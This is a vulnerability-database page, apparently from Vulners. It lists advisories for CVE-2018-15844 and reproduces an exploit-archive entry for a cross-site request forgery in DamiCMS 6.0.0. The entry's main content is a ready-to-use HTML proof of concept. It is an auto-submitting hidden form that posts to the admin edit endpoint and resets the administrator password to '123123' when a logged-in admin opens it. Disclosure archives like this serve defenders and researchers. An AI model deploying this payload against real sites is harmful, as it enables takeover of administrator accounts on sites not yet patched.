| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| DamiCMS Cross-Site Request Forgery Vulnerability (CNVD-2018-16532) | 27 Aug 201800:00 | – | cnvd | |
| CVE-2018-15844 | 25 Aug 201821:00 | – | cve | |
| CVE-2018-15844 | 25 Aug 201821:00 | – | cvelist | |
| EUVD-2018-7702 | 7 Oct 202500:30 | – | euvd | |
| DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password) | 31 Aug 201800:00 | – | exploitpack | |
| CVE-2018-15844 | 25 Aug 201821:29 | – | nvd | |
| DamiCMS 6.0.0 Cross Site Request Forgery | 31 Aug 201800:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 25 Aug 201821:29 | – | prion |
# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844
# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's
# password will been changed to 123123
# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="Submit" value="确定修改" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation